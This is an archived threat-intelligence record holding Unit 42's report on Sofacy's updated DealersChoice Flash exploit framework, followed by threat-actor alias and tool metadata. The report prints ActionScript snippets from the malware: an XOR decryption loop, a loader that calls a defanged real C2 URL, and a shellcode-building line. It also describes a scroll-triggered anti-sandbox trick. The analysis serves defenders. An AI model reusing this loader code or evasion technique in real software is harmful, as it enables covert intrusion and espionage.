{ "id": "bd8099b9-bd42-4ae4-b8a7-0a5f7da714a1", "created_at": "2026-04-06T00:07:31.715958Z", "updated_at": "2026-04-10T03:37:50.298786Z", "deleted_at": null, "sha1_hash": "423150ebcb7ad10c2970c20e6510787a7cbb55f1", "title": "Sofacy Uses DealersChoice to Target European Government Agency", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 120937, "plain_text": "Sofacy Uses DealersChoice to Target European Government\r\nAgency\r\nBy Robert Falcone\r\nPublished: 2018-03-15 · Archived: 2026-04-05 14:10:09 UTC\r\nSummary\r\nBack in October 2016, Unit 42 published an initial analysis on a Flash exploitation framework used by the Sofacy\r\nthreat group called DealersChoice. The attack consisted of Microsoft Word delivery documents that contained\r\nAdobe Flash objects capable of loading additional malicious Flash objects embedded in the file or directly\r\nprovided by a command and control server. Sofacy continued to use DealersChoice throughout the fall of 2016,\r\nwhich we also documented in our December 2016 publication discussing Sofacy’s larger campaign.\r\nOn March 12 and March 14, we observed the Sofacy group carrying out an attack on a European government\r\nagency involving an updated variant of DealersChoice. The updated DealersChoice documents used a similar\r\nprocess to obtain a malicious Flash object from a C2 server, but the inner mechanics of the Flash object contained\r\nsignificant differences in comparison to the original samples we analyzed.\r\nOne of the differences was a particularly clever evasion technique: to our knowledge this has never been observed\r\nin use. With the previous iterations of DealersChoice samples, the Flash object would immediately load and begin\r\nmalicious tasks. In the March attacks, the Flash object is only loaded if the user scrolls through the entire content\r\nof the delivery document and views the specific page the Flash object is embedded on. Also, DealersChoice\r\nrequires multiple interactions with an active C2 server to successfully exploit an end system.\r\nThe overall process to result in a successful exploitation is:\r\n1. User must open the Microsoft Word email attachment\r\n2. User must scroll to page three of the document, which will run the DealersChoice Flash object\r\n3. The Flash object must contact an active C2 server to download an additional Flash object containing\r\nexploit code\r\n4. The initial Flash object must contact the same C2 server to download a secondary payload\r\n5. Victim host must have a vulnerable version of Flash installed\r\n \r\nThe Attack\r\nThe attack involving this updated variant of DealersChoice was targeting a European government organization.\r\nThe attack relied on a spear-phishing email with a subject of \"Defence \u0026 Security 2018 Conference Agenda\" that\r\nhad an attachment with a filename of \"Defence \u0026 Security 2018 Conference Agenda.docx\". The attached\r\ndocument contains a conference agenda that the Sofacy group appears to have copied directly from the website for\r\nthe \"Underwater Defence \u0026 Security 2018 Conference\" here.\r\nOpening the attached \"Defence \u0026 Security 2018 Conference Agenda.docx\" file does not immediately run\r\nmalicious code to exploit the system. Instead, the user must scroll to the third page of the document, which will\r\nload a Flash object that contains ActionScript that will attempt to exploit the user’s system to install a malicious\r\nhttps://unit42.paloaltonetworks.com/unit42-sofacy-uses-dealerschoice-target-european-government-agency/\r\nPage 1 of 6\n\npayload. The Flash object embedded within this delivery document is a variant of an exploit tool that we call\r\nDealersChoice. This suggests that the Sofacy group is confident that the targeted individuals would be interested\r\nenough in the content to peruse through it.\r\nWe analyzed the document to determine the reason that the malicious Flash object only ran when the user scrolled\r\nto the third page. According to the document.xml file, the DealersChoice loader SWF exists after the \"covert-shores-small.png\" image file within the delivery document. This image file exists on the third page of the\r\ndocument, so the user would have to scroll down in the document to this third page to get the SWF file to run. The\r\nuser may not notice the Flash object on the page, as Word displays it as a tiny black box in the document, as seen\r\nin Figure 1. This is an interesting anti-sandbox technique, as it requires human interaction prior to the document\r\nexhibiting any malicious activity.\r\n \r\nFigure 1 Flash object appearing as a small black box in delivery document\r\n \r\nUpdated DealersChoice\r\nThis DealersChoice Flash object shares a similar process to previous variants; however, it appears that the Sofacy\r\nactors have made slight changes to its internal code. Also, it appears that the actors used ActionScript from an\r\nopen source video player called “f4player”, which is freely available on GitHub with the following description:\r\nf4Player is an open source flash (AS3) video player and library project. It is so small that it is only 10kb (with skin\r\nfile) and totally free under GPL license.\r\n  The Sofacy developer modified the f4player’s ActionScript to include additional code to load an embedded Flash\r\nobject. The additions include code to decrypt an embedded Flash object and an event handler that calls a newly\r\nadded function (“skinEvent2”) that plays the decrypted object, as seen in the code snippet below:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\nvar skinEvent2:Function = function(param1:Event):void\r\n{\r\n    skin2 = param1.currentTarget.content;\r\n    stage.addChild(skin2);\r\n    skin2.play(\"hxxp://ndpmedia24[.]com/0pq6m4f.m3u8\");\r\n};\r\nvar mov:Loader = new Loader();\r\nhttps://unit42.paloaltonetworks.com/unit42-sofacy-uses-dealerschoice-target-european-government-agency/\r\nPage 2 of 6\n\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\nmov.contentLoaderInfo.addEventListener(Event.COMPLETE,skinEvent2);\r\nvar b:ByteArray = new this.Mov();\r\nvar k:uint = 82;\r\nvar i:uint = 4;\r\nwhile(i \u003c b.length)\r\n{\r\n    b[i] = b[i] ^ k;\r\n    i++;\r\n}\r\nmov.loadBytes(b);\r\n \r\nThe above code allows DealersChoice to load a second SWF object, specifically loading it with an argument that\r\nincludes a C2 URL of “hxxp://ndpmedia24[.]com/0pq6m4f.m3u8”.\r\nThe embedded SWF extracts the domain from the C2 URL passed to it and uses it to craft a URL to get the\r\nserver's 'crossdomain.xml' file in order to obtain permissions to load additional Flash objects from the C2 domain.\r\nThe ActionScript relies on event listeners to call specific functions when the event \"Event.COMPLETE\" is\r\ntriggered after successful HTTP requests are issued to the C2 server. The event handlers call functions with the\r\nfollowing names, which includes an incrementing number that represents the order in which the functions are\r\ncalled:\r\nonload1\r\nonload2\r\nonload3\r\nonload5\r\nWith these event handlers created, the ActionScript starts by gathering system data from the\r\nflash.system.Capabilities.serverString property (just like in the original DealersChoice.B samples) and issues an\r\nHTTP GET with the system data as a parameter to the C2 URL that was passed as an argument to the embedded\r\nSWF when it was initially loaded. When this HTTP request completes, the event listener will call the 'onload1'\r\nfunction.\r\nThe 'onload1' function parses the response data from the request to the C2 URL using regular expressions.\r\nAccording to the following code snippet, it appears the regular expression is looking for a hexadecimal string after\r\n\"/\" and before \"/sec\", as well as any string between \"/hls/\" and \"/tracks\":\r\nvar data:String = e.target.data;\r\nhttps://unit42.paloaltonetworks.com/unit42-sofacy-uses-dealerschoice-target-european-government-agency/\r\nPage 3 of 6\n\nvar p1:RegExp = /\\/([0-9a-f]+)\\/sec/gim;\r\nr1 = p1.exec(data);\r\nvar r2:Array = p1.exec(data);\r\nvar p2:RegExp = /\\/hls\\/(.+)\\/tracks/gim;\r\nvar r3:Array = p2.exec(data);\r\nr4 = p2.exec(data);\r\n \r\nThe regular expressions suggest that the C2 server responds with content that is meant to resemble HTTP Live\r\nSteaming (HLS) traffic, which is a protocol that uses HTTP to deliver audio and video files for streaming. The use\r\nof HLS coincides with the use of ActionScript code from the f4player to make the traffic seem legitimate. The\r\nvariables storing the results of the regular expression matches are used within the ActionScript for further\r\ninteraction with the C2 server. The following is a list of these variables and their purpose:\r\n \r\nVariable Purpose\r\nr1\r\nUsed as the decryption key for the downloaded SWF file. This will be a 16-byte hexadecimal\r\nstring.\r\nr2 Not used.\r\nr3\r\nUsed as the URL within the HTTP request within onload1 function, specifically as the URL to get\r\nthe malicious SWF file to exploit the system.\r\nr4\r\nUsed as the URL within the HTTP request within onload2 function, specifically as the URL to get\r\nthe payload to run after successful exploitation of the system.\r\n \r\nThe 'onload1' function then sends an HTTP GET request to the C2 domain using the value stored in the 'r3'\r\nvariable as a URL. When this HTTP request completes, the event listener will call the 'onload2' function.\r\nThe 'onload2' function decrypts the response received from the HTTP request issued in 'onload1' function. It does\r\nso by calling a sub-function to decrypt the content, using the value stored in the 'r1' variable as a key. The sub-function to decrypt the content skips the first 4 bytes, suggesting that the first four bytes of the downloaded\r\ncontent is in cleartext (most likely the \"FWS\" or \"CWS\" header to look legitimate).\r\nAfter decrypting the content, the 'onload2' function will issue another HTTP GET request with the system data as\r\na parameter, but this time to the C2 using a URL from the 'r4' variable. When this request completes, the event\r\nlistener will call the 'onload3' function.\r\nThe 'onload3' function will take the response to the HTTP request in 'onload2' and treat it as the payload. The\r\nhttps://unit42.paloaltonetworks.com/unit42-sofacy-uses-dealerschoice-target-european-government-agency/\r\nPage 4 of 6\n\nActionScript will read each byte of the C2 response and get the hexadecimal value of each byte and create a text\r\narray of 4-byte hexadecimal values with \"0x\" prepended and \",\" appended to each using the following code:\r\nsh = she + (\"0x\" + hex.substr(i + 6,2) + hex.substr(i + 4,2) + hex.substr(i + 2,2) + hex.substr(i,2) + \",\");\r\n \r\nThis hexadecimal string will most likely be a string of shellcode that will contain and decrypt the ultimate portable\r\nexecutable (PE) payload. The string of comma separated hexadecimal values is passed as a parameter when\r\nloading the SWF file downloaded in 'onload2'. This function creates an event listener for when the SWF file is\r\nsuccessfully loaded, which will call the 'onload5' function.\r\nThe 'onload5' function is responsible for adding the newly loaded SWF object as a child object to the current\r\nrunning object using the following code:\r\nstage.addChild(param1.currentTarget.content);\r\nThis loads the SWF file, effectively running the malicious code on the system. During our analysis, we were\r\nunable to coerce the C2 into providing a malicious SWF or payload. As mentioned in our previous blogs on\r\nDealersChoice, the payload of choice for previous variants was SofacyCarberp (Seduploader), but we have no\r\nevidence to suggest this tool was used in this attack. We are actively researching and will update this blog in the\r\nevent we discover the malicious Flash object and payload delivered in this attack.\r\n  Linkage to Prior Campaign\r\nThe delivery document used in this attack was last modified by a user named 'Nick Daemoji', which provides a\r\nlinkage to previous Sofacy related delivery documents. The previous documents that used this user name were\r\nmacro-laden delivery documents that installed SofacyCarberp/Seduploader payloads, as discussed in Talos' blog.\r\nThis overlap also points to a similar social engineering theme between these two campaigns, as both used content\r\nfrom upcoming military and defense conferences as a lure.\r\n  Conclusion\r\nThe Sofacy threat group continues to use their DealersChoice framework to exploit Flash vulnerabilities in their\r\nattack campaigns. In the most recent variant, Sofacy modified the internals of the malicious scripts, but continues\r\nto follow the same process used by previous variants by obtaining a malicious Flash object and payload directly\r\nfrom the C2 server. Unlike previous samples, this DealersChoice used a DOCX delivery document that required\r\nthe user to scroll through the document to trigger the malicious Flash object. The required user interaction turned\r\nout to be an interesting anti-sandbox technique that we had not seen this group perform in the past.\r\n  Indicators of Compromise\r\nDealersChoice\r\n0cd9ac328d858d8d83c9eb73bfdc59a958873b3d71b24c888d7408d9512a41d7 (Defence \u0026 Security 2018\r\nConference Agenda.docx)\r\nndpmedia24[.]com\r\nhttps://unit42.paloaltonetworks.com/unit42-sofacy-uses-dealerschoice-target-european-government-agency/\r\nPage 5 of 6\n\nMacro-ladened documents\r\ne5511b22245e26a003923ba476d7c36029939b2d1936e17a9b35b396467179ae\r\nefb235776851502672dba5ef45d96cc65cb9ebba1b49949393a6a85b9c822f52\r\nc4be15f9ccfecf7a463f3b1d4a17e7b4f95de939e057662c3f97b52f7fa3c52f\r\nSource: https://unit42.paloaltonetworks.com/unit42-sofacy-uses-dealerschoice-target-european-government-agency/\r\nhttps://unit42.paloaltonetworks.com/unit42-sofacy-uses-dealerschoice-target-european-government-agency/\r\nPage 6 of 6", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://unit42.paloaltonetworks.com/unit42-sofacy-uses-dealerschoice-target-european-government-agency/" ], "report_names": [ "unit42-sofacy-uses-dealerschoice-target-european-government-agency" ], "threat_actors": [ { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434051, "ts_updated_at": 1775792270, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/423150ebcb7ad10c2970c20e6510787a7cbb55f1.pdf", "text": "https://archive.orkl.eu/423150ebcb7ad10c2970c20e6510787a7cbb55f1.txt", "img": "https://archive.orkl.eu/423150ebcb7ad10c2970c20e6510787a7cbb55f1.jpg" } }